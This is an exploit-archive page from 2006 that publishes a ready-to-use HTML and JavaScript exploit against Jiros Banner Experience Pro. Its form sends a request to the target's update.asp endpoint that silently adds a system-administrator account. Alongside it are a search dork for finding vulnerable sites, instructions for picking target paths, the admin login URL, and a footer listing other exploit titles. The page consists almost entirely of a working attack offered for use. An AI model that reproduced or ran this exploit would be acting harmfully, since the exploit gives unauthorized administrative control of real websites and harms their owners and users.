exploits , vulnerabilities , articles , iros Banner Experience 1.0 (Create Admin Bypass) Remote Exploit

2006-03-09

iros Banner Experience 1.0 (Create Admin Bypass) Remote Exploit

Rated as : High Risk

<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add
Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter site!");
    return false;
  }
  if (confirm("Are you sure?")) {
   
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
    xplt.aName.value=document.xplt.aName.value;
    xplt.aEmail.value=document.xplt.aEmail.value;
    xplt.aPassword.value=document.xplt.aPassword.value;
    xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
    xplt.aIsActive=document.xplt.aIsActive.value;
    xplt.submit();
  }
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files
or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be
www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via
www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST"
onsubmit="jbxpl();">
Target -> <input type="text" name="victim"
value="www.victim.com/Path/" size="44"
class="xpl">
<input type="text" name="aName" value="Enter
Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter
Email" class="xpl" size="30">
<input type="text" name="aPassword"
value="Enter Password" class="xpl"
size="30">
<input type="hidden" name="aIsSystemAdmin"
value="True">
<input type="hidden" name="aIsActive"
value="True">
<input type="submit" value="Send"
class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>

Save this code as .htm and then execute.
securitydot.net - 2006-03-09

Exploits - newest 10 RSS | More

2007-06-15 38446 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23886 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit